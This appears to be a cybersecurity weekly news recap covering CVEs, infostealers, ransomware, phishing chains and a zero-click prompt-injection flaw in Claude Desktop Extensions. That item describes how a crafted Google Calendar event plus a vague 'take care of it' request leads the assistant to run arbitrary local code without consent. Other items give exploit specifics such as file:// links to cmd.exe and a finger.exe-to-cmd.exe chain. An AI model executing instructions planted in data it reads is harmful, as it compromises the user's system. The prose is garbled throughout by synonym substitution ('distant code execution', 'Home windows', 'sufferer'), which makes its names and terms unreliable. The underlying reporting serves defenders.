AI Immediate RCE, Claude 0-Click on, RenEngine Loader, Auto 0-Days & 25+ Tales

Microsoft has patched a command injection flaw (CVE-2026-20841, CVSS rating: 8.8) in its Notepad app that might end in distant code execution. “Improper neutralization of special elements used in a command (‘command injection’) in Windows Notepad App allows an unauthorized attacker to execute code over a network,” Microsoft stated. An attacker might exploit this flaw by tricking a consumer into clicking a malicious hyperlink inside a Markdown file opened in Notepad, inflicting the applying to run distant information. “The malicious code would execute in the security context of the user who opened the Markdown file, giving the attacker the same permissions as that user,” the tech large added. Proof-of-concept (PoC) exploits present that the vulnerability will be triggered by making a Markdown file with “file://” hyperlinks that time to executable information (“file://C:/windows/system32/cmd.exe”) or include particular URIs (“ms-appinstaller://?supply= to run arbitrary payloads. The problem was mounted as a part of its month-to-month Patch Tuesday replace this week. Microsoft added Markdown assist to Notepad on Home windows 11 final Might.

TeamT5 stated tracked greater than 510 superior persistent risk (APT) operations affecting 67 international locations globally in 2025, out of which 173 assaults focused Taiwan. “Taiwan’s role in geopolitical tensions and values in the global technology supply chain makes it uniquely vulnerable for adversaries who seek intelligence or long-term access to achieve political and military objectives,” the safety vendor stated. “Taiwan is more than just a target – it functions as a proving ground where China-nexus APTs test and refine their tactics before scaling them to other environments.”

A brand new Node.js info stealer named LTX Stealer has been noticed within the wild. Focusing on Home windows programs and distributed through a closely obfuscated Inno Setup installer, the malware conducts large-scale credential harvesting from Chromium-based browsers, targets cryptocurrency-related artifacts, and levels the collected information for exfiltration. “The campaign relies on a cloud-backed management infrastructure, where Supabase is used exclusively as the authentication and access-control layer for the operator panel, while Cloudflare is leveraged to front backend services and mask infrastructure details,” CYFIRMA stated.

One other new Home windows-oriented info stealer is Marco Stealer, which was first noticed in June 2025. Delivered through a downloader in a ZIP archive, it primarily targets browser information, cryptocurrency pockets info, information from in style cloud providers like Dropbox and Google Drive, and different delicate information saved on the sufferer’s system. “Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis. In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker,” Zscaler ThreatLabz stated. “Stolen data is encrypted using AES-256 before being sent to C2 servers via HTTP POST requests.”

A brand new account takeover marketing campaign has been noticed abusing Telegram’s native authentication workflows to acquire totally licensed consumer periods. In a single variant, victims are prompted to scan a QR code on bogus websites utilizing the Telegram cell software, initiating a authentic Telegram login try tied to attacker-controlled API credentials. Telegram then sends an in-app authorization immediate to the sufferer’s present session. Alternatively, customers also can enter their nation code, telephone quantity, and verification code (if enabled) on a pretend internet web page, which causes the information to be relayed to Telegram’s official authentication APIs. Upon profitable verification, Telegram points an in-app authorization request as earlier than. “Unlike traditional phishing attacks that rely solely on credential harvesting or token replay, this campaign leverages attacker-controlled Telegram API credentials and integrates directly with Telegram’s legitimate login and authorization infrastructure,” CYFIRMA famous. “By inducing victims to approve in-app authorization prompts under false pretenses, the attackers achieve complete session compromise while minimizing technical anomalies and user suspicion.”

Discord has introduced it can require all customers globally to confirm their ages by sharing video selfies or offering authorities IDs to entry sure content material. Moreover, it can implement an age inference mannequin, a brand new system that runs within the background to assist decide whether or not an account belongs to an grownup, with out at all times requiring customers to confirm their age. The corporate has assured that video selfies do not go away a consumer’s system, that identification paperwork submitted to third-party distributors, on this case k-ID, are “deleted quickly” or “immediately” after age affirmation, and {that a} consumer’s age verification standing can’t be seen by different customers. Nonetheless, considerations have been raised about whether or not Discord will be trusted with their most delicate info, particularly within the aftermath of a safety breach of a third-party service that Discord beforehand relied on to confirm ages within the U.Ok. and Australia. The incident led to the theft of presidency IDs of 70,000 Discord customers. In a press release given to Ars Technica, k-ID stated the age estimation expertise runs fully on system and no third-parties retailer private information shared throughout age checks. The transfer comes at a time when legal guidelines requiring age verification on social media platforms are being adopted internationally. Discord confirmed that “a phased global rollout” would start in “early March,” at which level all customers globally can be defaulted to “teen-appropriate” experiences.

A brand new evaluation of the GuLoader malware has revealed that it employs polymorphic code to dynamically assemble constants throughout execution and exception-based management circulation obfuscation to hide its performance and evade detection. Moreover introducing refined exception-handling mechanisms to complicate evaluation, the malware makes an attempt to bypass reputation-based guidelines by internet hosting payloads on trusted cloud providers corresponding to Google Drive and OneDrive. First noticed in December 2019, GuLoader serves primarily as a downloader for Distant Entry Trojans (RATs) and data stealers.

Daren Li, 42, a twin nationwide of China and St. Kitts and Nevis has been sentenced in absentia within the U.S. to the statutory most of 20 years in jail and three years of supervised launch for his worldwide cryptocurrency funding scheme referred to as pig butchering or romance baiting that defrauded victims of greater than $73.6 million. Li pleaded responsible to his crime in November 2024. Nonetheless, the defendant lower off his ankle monitor and fled the nation in December 2025. His current whereabouts are unknown. “As part of his plea agreement, Li admitted that unindicted members of the conspiracy would contact victims directly through unsolicited social-media interactions, telephone calls and messages, and online dating services,” the U.S. Justice Division stated. “The unindicted co-conspirators would gain the trust of victims by establishing either professional or romantic relationships with them, often communicating by electronic messages sent via end-to-end encrypted applications.” The co-conspirators established spoofed domains and web sites that resembled authentic cryptocurrency buying and selling platforms and tricked victims into investing in cryptocurrency by way of these fraudulent platforms after gaining their belief. Li additionally confessed that he would direct co-conspirators to open U.S. financial institution accounts established on behalf of 74 shell corporations and would monitor the receipt of interstate and worldwide wire transfers of sufferer funds. “Li and other co-conspirators would receive victim funds in financial accounts that they controlled and then monitor the conversion of victim funds to virtual currency,” the division stated.

A zero-click distant code execution vulnerability (CVSS rating: 10.0) in Claude Desktop Extensions (DXT) might be exploited to silently compromise a system by a easy Google Calendar occasion when a consumer points a innocent immediate like “Please check my latest events in google cal[endar] and then take care of it for me.” The issue stems from how MCP-based programs like Claude DXT autonomously chain collectively completely different instruments and exterior connectors to fulfil consumer requests with out implementing correct safety boundaries. The phrase “take care of it” does the heavy lifting right here, as the bogus intelligence (AI) assistant interprets it as a justification to execute arbitrary directions embedded in these occasions with out searching for customers’ permission. The flaw impacts greater than 10,000 lively customers and 50 DXT extensions, in line with LayerX. “Unlike traditional browser extensions, Claude Desktop Extensions run unsandboxed with full system privileges,” the browser safety firm stated. “As a result, Claude can autonomously chain low-risk connectors (e.g., Google Calendar) to high-risk local executors, without user awareness or consent. If exploited by a bad actor, even a benign prompt (‘take care of it’), coupled with a maliciously worded calendar event, is sufficient to trigger arbitrary local code execution that compromises the entire system.” Anthropic has opted to not repair the difficulty at the moment. The same Google Gemini immediate injection flaw was disclosed by Miggo Safety final month.

A nascent ransomware group known as Coinbase Cartel has claimed greater than 60 victims because it first emerged in September 2025. “Coinbase Cartel operations are marked by an insistence on stealing data while leaving systems available rather than complementing data theft with the use of encryptors that prohibit system access,” Bitdefender stated. The healthcare, expertise, and transportation industries signify a significant chunk of Coinbase Cartel’s biggest sufferer demographic to this point. The healthcare organizations impacted by the risk actor are based totally within the U.A.E. A number of the different outstanding teams which might be centered on solely information theft are World Leaks and PEAR (Pure Extraction and Ransom). The event paints an image of an ever-evolving ransomware panorama populated by new and outdated actors, even because the risk is getting more and more professionalized as attackers streamline operations. In line with information from Cyble, 6,604 ransomware assaults have been recorded in 2025, up 52% from the 4,346 assaults claimed by ransomware teams in 2024.

Google has expanded its “Results about you” instrument to provide customers extra management over delicate private info and added a approach to request elimination of non-consensual specific photographs from search outcomes, in addition to different particulars like driver’s license numbers, passport numbers, and Social Safety numbers. “We understand that removing existing content is only part of the solution,” Google stated. “For added protection, the new process allows you to opt in to safeguards that will proactively filter out any additional explicit results that might appear in similar searches.”

Risk actors have been noticed leveraging Web Monitor, a business workforce monitoring instrument, with SimpleHelp, a authentic distant monitoring and administration (RMM) platform, as a part of assaults designed to deploy Loopy ransomware. The 2 incidents, believed to be the work of the identical risk actor, happened in January and February 2026. Web Monitor comes with numerous capabilities that transcend worker productiveness monitoring, together with reverse shell connections, distant desktop management, file administration, and the power to customise service and course of names throughout set up. These options, coupled with SimpleHelp’s distant entry performance, make them enticing instruments for attackers trying to mix into enterprise environments with out deploying conventional malware. What’s extra, Web Monitor for Staff Skilled bundles a pseudo-terminal (“winpty-agent.exe”) that facilitates full command execution. Unhealthy actors have been discovered to leverage this facet to conduct reconnaissance, ship further payloads, and deploy secondary distant entry channels, turning it right into a practical distant entry trojan. “In the cases observed, threat actors used these two tools together, using Net Monitor for Employees as a primary remote access channel and SimpleHelp as a redundant persistence layer, ultimately leading to the attempted deployment of Crazy ransomware,” Huntress stated.

A risk actor known as 0APT seems to be falsely claiming that it has breached over 200 victims inside a span of per week since launching their information leak website on January 28, 2026. Additional evaluation has decided that the victims are a mix of wholly fabricated generic firm names and recognizable organizations that risk actors haven’t breached, GuidePoint’s Analysis and Intelligence Staff stated. The info leak website went offline on February 8, 2026, earlier than resurfacing the following day with an inventory of greater than 15 very massive multinational organizations. “0APT is likely operating in this deceptive manner in order to support extortion of uninformed victims, re-extortion of historical victims from other groups, defrauding of potential affiliates, or to garner interest in a nascent RaaS group,” safety researcher Jason Baker famous. Whereas indicators recommend that the group could also be bluffing about its sufferer depend, the Home windows and Linux ransomware samples have been discovered to be totally operational, per Halcyon. It is value stating that ransomware teams like RansomedVC have listed fabricated assaults on their information leak websites to deceive victims. Seen in that mild, 0APT’s exaggerated claims are probably an try to achieve visibility and momentum amongst its friends. Its origins stay unknown.

A high-risk safety vulnerability (CVE-2025-67813, CVSS rating: 5.3) inside Quest Desktop Authority might enable attackers to execute distant code with SYSTEM privileges. “Quest KACE Desktop Authority exposes a named pipe (ScriptLogic_Server_NamedPipe_9300) running as SYSTEM that accepts connections from any authenticated domain user over the network,” NetSPI stated. The named pipe implements a customized IPC protocol that helps harmful operations, together with arbitrary command execution, DLL injection, credential retrieval, and COM object invocation. Any authenticated consumer on the community can obtain distant code execution as a neighborhood administrator on hosts operating the Desktop Authority agent.

Russia’s web watchdog will use synthetic intelligence (AI) expertise to research web site visitors and prohibit the operation of VPN providers, Forbes Russia reported. The Roskomnadzor is predicted to spend near $30 million to develop the web site visitors filtering mechanism this yr. The Russian authorities has blocked entry to tens of VPN apps lately. It additionally maintains a registry of banned web sites.

Cofense stated it has noticed Mispadu campaigns concentrating on Latin America, notably Mexico and Brazil, and to a lesser extent in Spain, Italy, and Portugal, with phishing emails containing HTML Utility (HTA) attachments which might be designed to bypass Safe E-mail Gateways (SEGs) to succeed in the inboxes of staff internationally. “The only variation is that sometimes the URL delivering the HTA files is embedded in an attached, password-protected PDF rather than embedded in the email itself,” Cofense stated. “In all recent campaigns, Mispadu makes use of an AutoIT loader and various legitimate files to run the malicious content. Each step of the delivery chain from the attached PDF to the AutoIT script is dynamically generated. This means that every hash except for the AutoIT compiler is unique to each install, further frustrating EDR.” Latest iterations of the banking trojan include the power to self-propagate on contaminated hosts through e mail and increase the goal on-line banking web sites to incorporate banks exterior of Latin America in addition to cryptocurrency-based exchanges.

In a phishing marketing campaign documented by Forcepoint, spoofed emails have been discovered to ship a malicious .cmd attachment that escalates privileges, disables Home windows SmartScreen, removes the mark-of-the-web (MotW) to bypass safety warnings, and finally installs ConnectWise ScreenConnect. The marketing campaign has focused organizations throughout the U.S., Canada, the U.Ok., and Northern Eire, specializing in sectors with high-value information, together with authorities, healthcare, and logistics corporations. Latest phishing assaults have additionally abused internet providers from Amazon, like Easy Storage Service (S3) buckets, Amazon Easy E-mail Service (SES), and Amazon Internet Companies (AWS) Amplify to slide previous e mail safety controls and launch credential phishing assaults. Different phishing assaults have embraced unusual strategies like utilizing edited variations of authentic enterprise emails to ship convincingly spoofed emails to recipients. “These emails work by having the threat actor create an account on a legitimate service and input arbitrary text into a field that will later be included in outgoing emails,” Cofense stated. “After this is done, the threat actor would need to receive a legitimate email that happens to include the malicious text that was created by the threat actor. Once the email is received, the threat actor can then redirect the email to the intended victims.”

A variant of the ClickFix assault known as CrashFix has been used to ship malicious payloads in line with a recognized malware known as SystemBC. Not like the CrashFix-style social engineering circulation documented by Huntress and Microsoft, the assault stands out as a result of it didn’t contain using a malicious browser extension. “Instead, the victim was convinced to execute a command via the Windows Run dialog (Win+R) as seen with traditional ClickFix,” Binary Protection stated. “This command abused a legitimate Windows binary — finger.exe — copied from System32, renamed, and executed from a user-writable directory. The output of this execution was piped directly into cmd.exe, acting as a delivery mechanism for an obfuscated PowerShell payload.” The PowerShell code then retrieves follow-on content material, together with Python backdoors and a DLL implant that overlaps with SystemBC, from attacker-controlled infrastructure, whereas taking steps to fingerprint the host and clear up artifacts on disk. “The coexistence of Python backdoors and a reflective DLL implant highlights a deliberate defense-evasion and persistence strategy,” the corporate stated. “By mixing scripting-based and native implants, the attacker reduced reliance on any single execution method, making complete eviction more difficult.”

The third annual Pwn2Own Automotive competitors held in Tokyo, Japan, late final month uncovered 76 distinctive zero-day vulnerabilities in quite a lot of targets, corresponding to in-vehicle infotainment (IVI) programs (Tesla), electrical automobile (EV) chargers (Alpitronic HYC50, ChargePoint House Flex), and automotive working programs (Automotive Grade Linux). Staff Fuzzware.io received the hacking competitors with whole winnings of $215,000, adopted by Staff DDOS with $100,750 and Synactiv with $85,000.

Malicious adverts served on Bing search outcomes when trying to find websites like Amazon are getting used to redirect unsuspecting customers to tech assist rip-off hyperlinks hosted in Azure Blob Storage. The marketing campaign focused healthcare, manufacturing, and expertise sectors within the U.S. “Clicking on the malicious ad sent the victims to highswit[.]space, a newly registered domain hosting an empty WordPress site, which then redirected them to one of the Azure Blob Storage containers, which served a typical tech support scam site,” Netskope Risk Labs stated.

A Chinese language digital non-public community (VPN) supplier named LVCHA VPN has been utilized by units in Russia, China, Myanmar, Iran, and Venezuela. It additionally has an Android app that is immediately hosted on its web site (“lvcha[.]in”) and distributed through the Google Play Retailer. Additional evaluation of the area has uncovered a cluster of almost 50 suspicious domains, all of which promote the identical VPN. “Whenever we see campaigns promoting suspicious downloads or products using so many domains, it can indicate that the operator is rotating domains to work around country-level firewalls in regions where they’re trying to promote distribution,” Silent Push stated.

Following a late December 2025 coordinated cyber assault on Poland’s energy grid, the U.S. Cybersecurity and Infrastructure Safety Company (CISA) has revealed a bulletin for essential infrastructure homeowners and operators. CISA stated susceptible edge units stay a chief goal for risk actors, OT units with out firmware verification will be completely broken, and risk actors leverage default credentials to pivot onto the HMI and RTUs. “Operators should prioritize updates that allow firmware verification when available,” the company added. “Operators should immediately change default passwords and establish requirements for integrators or OT suppliers to enforce password changes in the future.” In an analogous growth, Jonathan Ellison, director for nationwide resilience on the Nationwide Cyber Safety Centre (NCSC), has urged essential infrastructure operators within the nation to behave now and have incident response plans or playbooks in place to answer such threats. “Although attacks can still happen, strong resilience and recovery plans reduce both the chances of an attack succeeding and the impact if one does,” Ellison stated.

Risk intelligence agency GreyNoise stated it noticed a steep decline in world Telnet site visitors on January 14, 2026, six days earlier than a safety advisory for CVE-2026-24061 went public on January 20. CVE-2026-24061 pertains to a essential vulnerability within the GNU InetUtils telnet daemon that might end in an authentication bypass. Information gathered by GreyNoise exhibits that the hourly quantity of Telnet periods dropped 65% on January 14 at 21:00 UTC, then fell 83% inside two hours. Day by day periods have declined from a median of 914,000 (from December 1, 2025, to January 14, 2026) to round 373,000, equating to a 59% discount that has persevered as of February 10, 2026. “Eighteen ASNs with significant pre-drop telnet volume (>50K sessions each) went to absolute zero after January 15,” the corporate stated. “Five entire countries vanished from GreyNoise telnet data: Zimbabwe, Ukraine, Canada, Poland, and Egypt. Not reduced to zero.” Among the many 18 ASNs included have been British Telecom, Constitution/Spectrum, Cox Communications, and Vultr. Though correlation doesn’t indicate causation, GreyNoise has raised the likelihood that the telecom operators probably obtained advance warning about CVE-2026-24061, permitting them to behave on it on the infrastructure stage. “A backbone or transit provider — possibly responding to a coordinated request, possibly acting on their own assessment — implemented port 23 filtering [to block telnet traffic] on transit links,” it stated.

Cyderes and Cato Networks have detailed new beforehand undocumented malware loaders dubbed RenEngine Loader and Foxveil which were used to ship next-stage payloads. The Foxveil malware marketing campaign has been lively since August 2025. It is engineered to ascertain an preliminary foothold, complicate evaluation efforts, and retrieve next-stage shellcode payloads from risk actor-controlled staging hosted on trusted platforms like Cloudflare Pages, Netlify, and Discord. Assaults leveraging RenEngine Loader, then again, have employed illegally modified recreation installers distributed through piracy platforms to ship the malware alongside the playable content material. Greater than 400,000 world victims are estimated to have been impacted, with most of them situated in India, the U.S., and Brazil. The exercise has been operational since April 2025. “RenEngine Loader decrypts, stages, and transfers execution to Hijack Loader, enabling rapid tooling evolution and flexible capability deployment,” Cyderes stated. “By embedding a modular, stealth-focused second-stage loader inside a legitimate Ren’Py launcher, the attackers closely mimic normal application behavior, significantly reducing early detection.” The top objective of the assault is to deploy an info stealer known as ACR Stealer.

Two novel safety vulnerabilities have been disclosed in Google Looker that might be exploited by an attacker to totally compromise a Looker occasion. This features a distant code execution (RCE) chain through Git hook overrides and an authorization bypass flaw through inside database connection abuse. Profitable exploitation of the failings might enable an attacker to run arbitrary code on the Looker server, probably resulting in cross-tenant entry, in addition to exfiltrate the complete inside MySQL database through error-based SQL injection, in line with Tenable. “The vulnerabilities allowed users with developer permissions in Looker to access both the underlying system hosting Looker, and its internal database,” Google stated. Collectively tracked as CVE-2025-12743, aka LookOut (CVSS rating: 6.5), they have been patched by Google in September 2025. Whereas the fixes have been utilized to cloud situations, customers of self-hosted Looker situations are suggested to replace to the most recent supported model.

A pretend installer for the 7-Zip file archiver instrument downloaded from 7zip[.]com (the authentic area is 7-zip[.]org) is getting used to drop a proxy element that enrolls the contaminated host right into a residential proxy node. This permits third events to route site visitors by way of the sufferer’s IP handle whereas concealing their very own origins. The installer is digitally signed with a now-revoked certificates initially issued to Jozeal Community Expertise Co., Restricted. The marketing campaign has been codenamed upStage Proxy by safety researcher Luke Acha, who found it late final month. “The operators behind 7zip[.]com distributed a trojanized installer via a lookalike domain, delivering a functional copy of 7-Zip File Manager alongside a concealed malware payload,” Malwarebytes stated. The 7-Zip lure seems to be a part of a broader effort that makes use of trojanized installers for HolaVPN, TikTok, WhatsApp, and Wire VPN. Assault chains contain utilizing YouTube tutorials as a malware distribution vector to direct unsuspecting customers to the bogus website, as soon as once more highlighting the abuse of trusted platforms.

VoidLink is a complicated Linux-based command-and-control (C2) framework able to long-term intrusion throughout cloud and enterprise environments. First documented by Test Level final month, ongoing analyses of the malware have revealed that it might have been developed by a Chinese language-speaking developer utilizing a man-made intelligence (AI) mannequin with restricted human overview. Ontinue, in a report revealed this week, stated it discovered “strong indicators” that the implant was constructed utilizing a big language mannequin (LLM) coding agent. “It fingerprints cloud environments across AWS, GCP, Azure, Alibaba Cloud, and Tencent Cloud, harvesting credentials from environment variables, config directories, and instance metadata APIs,” safety researcher Rhys Downing stated. “It detects container runtimes and includes plugins for container escape and Kubernetes privilege escalation. A kernel-level rootkit adapts its stealth approach based on the host’s kernel version.” Cisco Talos stated it has noticed the modular framework in campaigns undertaken by a brand new risk actor codenamed UAT-9921, which is believed to have been lively since 2019. The cybersecurity firm stated it additionally discovered “clear indications” of a Home windows equal of VoidLink that comes with the power to load plugins. “UAT-9921 uses compromised hosts to install VoidLink command and control (C2), which are then used to launch scanning activities both internal and external to the network,” Talos researchers stated.